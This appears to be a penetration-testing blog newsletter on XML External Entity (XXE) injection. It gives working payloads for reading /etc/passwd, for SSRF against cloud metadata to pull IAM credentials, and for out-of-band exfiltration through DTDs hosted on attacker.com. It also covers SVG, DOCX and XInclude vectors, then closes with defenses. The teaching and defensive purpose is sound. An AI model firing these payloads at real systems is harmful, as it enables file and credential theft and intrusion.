XXE Injection: When XML Parsers Become Your Worst Enemy
10 min read
November 2, 2025
🚧 Site Migration Notice
I've recently migrated this site from Ghost CMS to a new Astro-based frontend. While I've worked hard to ensure everything transferred correctly, some articles may contain formatting errors or broken elements.
If you spot any issues, I'd really appreciate it if you could let me know! Your feedback helps improve the site for everyone.

Table of contents
Hey everyone,
A few weeks ago, a colleague was testing an internal API and stumbled on an XXE vulnerability. The thing is, it was blind. No direct output, no error messages, nothing. We knew the parser was processing our entities, but we couldn’t figure out how to exfiltrate the data properly. We tried a few OOB techniques, but honestly, we didn’t nail the exploitation.
That stuck with me. I hate leaving vulnerabilities half-exploited. So I spent some time digging deeper into blind XXE, out-of-band exfiltration, and all the edge cases we probably missed.
The thing about XXE is that it’s one of those vulnerabilities that feels almost too easy when you find it. But when you don’t know what to look for, you’ll walk right past it. And that’s exactly why it keeps showing up in penetration tests, bug bounty reports, and CVEs year after year.
So let’s fix that. This newsletter breaks down XML External Entity (XXE) injection: what it is, how it works, and how to exploit it from basic file disclosure to blind out-of-band exfiltration.
What XXE Actually Is
XXE is a vulnerability that lets you abuse how XML parsers process external entities. When an application parses XML without properly configuring its parser, you can inject malicious entity declarations that force the server to:
- Read arbitrary files from the filesystem
- Make HTTP requests to internal systems (SSRF)
- Perform denial of service attacks
- In rare cases, achieve remote code execution
The root cause is simple: the XML 1.0 specification allows entities (basically variables in XML) to reference external resources. If the parser follows those references and the input isn’t sanitized, attackers control what gets loaded.
Here’s the basic structure of an XXE payload:
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>
When the parser processes this, it reads /etc/passwd and injects its contents where &xxe; appears. If that data shows up in the application’s response, you’ve got file disclosure.
Why This Still Matters in 2025
You’d think this would be fixed by now, right? It’s been on the OWASP Top 10 since 2017. But XXE vulnerabilities keep showing up.
Recent examples:
-
CVE-2024-34102 (CosmicSting) – A critical unauthenticated XXE in Adobe Commerce and Magento that could lead to remote code execution. Affected versions before 2.4.7-p1. CVSS score: 9.8/10.
-
CVE-2024-30043 – XXE in Microsoft SharePoint Server allowing file read with Farm Service account permissions and SSRF attacks. Patched in May 2024.
-
CVE-2023-42344 – Unauthenticated XXE in OpenCMS (versions 9.0.0 to 10.5.0) allowing remote code execution without authentication.
These aren’t small apps. These are enterprise platforms with millions of users. The problem? Legacy code, third-party libraries with insecure defaults, and developers who don’t realize their XML parser is dangerous out of the box.
Finding XXE Vulnerabilities
Not every endpoint that accepts XML is vulnerable. Modern frameworks often disable external entities by default. But you’d be surprised how many don’t.
Where to Look
Check any functionality that processes XML:
- File uploads (especially DOCX, XLSX, SVG, or other XML-based formats)
- API endpoints that accept
Content-Type: application/xml - SOAP services
- RSS/Atom feed parsers
- SAML authentication flows
- Configuration file uploads
Testing for XXE
Start with a basic probe. Send this payload and see if the parser even processes entities:
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY test "HelloXXE">
]>
<root>
<data>&test;</data>
</root>
If the response includes “HelloXXE” where you referenced &test;, the parser is processing entities. Now you can escalate.
Basic File Disclosure
The classic XXE attack: read files from the server’s filesystem.
Payload to read /etc/passwd:
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<username>&xxe;</username>
</root>
If the application reflects the <username> value in its response, you’ll see the contents of /etc/passwd.
Common files to target:
/etc/passwd– User accounts (Linux/Unix)/etc/hosts– Network configurationC:\Windows\System32\drivers\etc\hosts– Windows hosts file/proc/self/environ– Environment variables (might leak secrets)- Application config files (e.g.,
/var/www/html/config.php) - Cloud metadata endpoints (more on this in a sec)
One thing to watch out for: some files contain characters that break XML parsing (like < or &). We’ll handle that with Base64 encoding in the blind XXE section.
XXE to SSRF
This is where XXE gets really interesting. Instead of reading local files, you can make the server send HTTP requests to internal systems.
Example payload:
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://internal-service:8080/admin">
]>
<root>
<data>&xxe;</data>
</root>
The server makes an HTTP request to http://internal-service:8080/admin and includes the response in its output. This bypasses firewalls and gives you access to internal APIs, admin panels, or cloud metadata endpoints.
Cloud metadata exploitation:
If you’re testing an app running on AWS, try this:
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
This hits the AWS metadata service and can leak IAM credentials with full access to the cloud account. Same concept works for Azure (http://169.254.169.254/metadata/instance?api-version=2021-02-01) and GCP.
Combined with my SSRF newsletter from Issue 4, you can chain XXE into full internal network access.
Blind XXE: When You Don’t See Output
Sometimes the application doesn’t reflect the XML data in its response. The parser processes your payload, but you don’t see the result. That’s blind XXE.
Out-of-Band (OOB) Exfiltration
The trick here is to make the server send the data to a system you control. You need two things:
- A server you control to receive the data (use Burp Collaborator, your own VPS, or
webhook.site) - A payload that references an external DTD hosted on your server
Step 1: Host a malicious DTD on your server (http://attacker.com/evil.dtd):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;
Step 2: Send this payload to the target:
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root></root>
Here’s what happens:
- The parser loads your external DTD
- The DTD defines a parameter entity that reads
/etc/passwd - It defines another entity that makes an HTTP request to your server, embedding the file contents in the URL
- Your server receives the request with the file data in the query string
Pro tip: If the file contains special characters that break URLs, wrap it in Base64:
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
Then Base64-decode the exfiltrated data on your end.
Error-Based Blind XXE
If OOB doesn’t work (firewalls, no egress, etc.), you can sometimes leak data through error messages. This technique also typically requires an external DTD.
Malicious DTD hosted on your server (http://attacker.com/error.dtd):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
Payload sent to target:
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % dtd SYSTEM "http://attacker.com/error.dtd">
%dtd;
]>
<root></root>
The parser tries to access a file at /nonexistent/[contents of /etc/passwd], fails, and includes the file path (with embedded file contents) in the error message.
Note: Because of XML specification restrictions on using parameter entities within internal DTDs, this technique requires either an external DTD or repurposing an existing local DTD file on the server.
XXE in Unexpected Places
Don’t just test plain XML endpoints. XXE hides in formats you wouldn’t expect.
File Uploads
SVG images are XML-based. If an app lets you upload profile pictures and processes SVG files, try embedding an XXE payload:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text>&xxe;</text>
</svg>
Upload it, and if the app displays or processes the SVG server-side, you might trigger XXE.
DOCX and XLSX files are ZIP archives containing XML. Extract one, modify the XML inside (e.g., word/document.xml), inject your payload, rezip it, and upload. I’ve seen this work in document preview features and automated processing systems.
XInclude Attacks
Sometimes you don’t control the entire XML document, just a single value inside it. Standard XXE won’t work because you can’t define a DOCTYPE. That’s where XInclude comes in.
If you control a value in the XML, try this:
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
XInclude lets you include external files directly in XML elements, bypassing the need for entity declarations.
Content-Type Switching
Some apps accept Content-Type: application/json but also parse application/xml if you send it. Try switching your POST request from JSON to XML and see if the endpoint still processes it.
From this:
POST /api/user HTTP/1.1
Content-Type: application/json
{"username": "test"}
To this:
POST /api/user HTTP/1.1
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><username>&xxe;</username></root>
If the backend uses a library that auto-detects content types or falls back to XML parsing, you might trigger XXE on an endpoint that wasn’t designed to accept XML.
Tools You Need
Burp Suite – Essential for intercepting and modifying requests. Burp Collaborator is perfect for OOB testing.
XXEinjector – Automates XXE exploitation including OOB exfiltration and enumeration. Supports direct and out-of-band methods (FTP, HTTP, Gopher). https://github.com/enjoiz/XXEinjector
DTD Finder – Lists DTDs and generates XXE payloads using local DTD files. Useful for blind XXE exploitation. https://github.com/GoSecure/dtd-finder
PayloadsAllTheThings (XXE Section) – Comprehensive payload collection with classic XXE, OOB, and various exploitation techniques. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
Where to Practice
PortSwigger Web Security Academy – Multiple XXE labs with increasing difficulty. All labs are free:
- Exploiting XXE to retrieve files
- Exploiting XXE to perform SSRF attacks
- Exploiting XXE via image file upload
- Exploiting XInclude to retrieve files
Main XXE page: https://portswigger.net/web-security/xxe
TryHackMe – XXE Injection Room – Premium room covering in-band, out-of-band, and expansion XXE attacks. Includes exercises chaining XXE with SSRF. https://tryhackme.com/room/xxeinjection
Hack The Box – BountyHunter – Easy-rated Linux machine featuring XXE exploitation to read PHP source files and dump database credentials. Good introduction to practical XXE in a realistic scenario. https://app.hackthebox.com/machines/BountyHunter
Defense and Detection
If you’re defending against XXE, here’s what actually works:
Disable External Entities – The nuclear option. Most XML libraries have config flags to disable DTD processing entirely. Use them.
// Java example
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
Use Simple Data Formats – If you don’t need XML’s complexity, use JSON. Fewer features = smaller attack surface.
Input Validation – Reject any XML containing DOCTYPE, ENTITY, or SYSTEM keywords. Not foolproof, but catches lazy attacks.
Least Privilege – Run your XML parser with minimal file system access. If it can’t read /etc/passwd, XXE becomes much less useful.
Monitor Outbound Traffic – Blind XXE relies on exfiltration. Alert on unexpected HTTP requests from your backend to external IPs.
Wrapping Up
XXE is one of those vulnerabilities that seems straightforward on paper but has a surprising amount of depth. Basic file disclosure is the entry point, but once you understand OOB exfiltration, SSRF chaining, and hunting XXE in unexpected formats like SVG or DOCX, you unlock a whole new class of attack vectors.
The reason XXE keeps appearing in CVEs is that it’s easy to miss. An app might not directly accept XML, but a third-party library processing uploaded files might. Or an API endpoint designed for JSON might fall back to XML parsing. Or a developer might enable XML features “just in case” and never disable them.
So next time you’re testing an app, grep for XML. Check file uploads. Try content-type switching. You might be surprised what you find.
Coming This Week
This week, probably on Wednesday, I’ll be publishing a new article in the Web3 series: an introduction to how signatures work in Ethereum. We’ll cover the fundamentals of digital signatures, how Ethereum implements them, and why they’re critical for smart contract and wallet security. It’s the perfect starting point before diving into replay attacks and other signature-based exploitation techniques.
Thanks for reading, and happy hunting.
Ruben
Chapters
Previous Issue